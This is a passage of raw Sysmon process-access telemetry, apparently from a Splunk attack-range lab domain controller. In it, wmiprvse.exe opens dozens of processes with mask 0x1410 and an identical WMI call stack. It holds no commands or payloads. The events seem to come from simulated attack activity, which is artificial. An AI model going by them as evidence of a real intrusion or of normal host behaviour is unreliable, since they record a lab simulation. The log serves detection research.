indows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024975Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024974Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024973Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024972Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024971Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024970Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024969Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024968Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024967Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024966Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024965Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024964Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024963Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024962Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024961Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024960Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024959Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024958Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024957Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024956Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 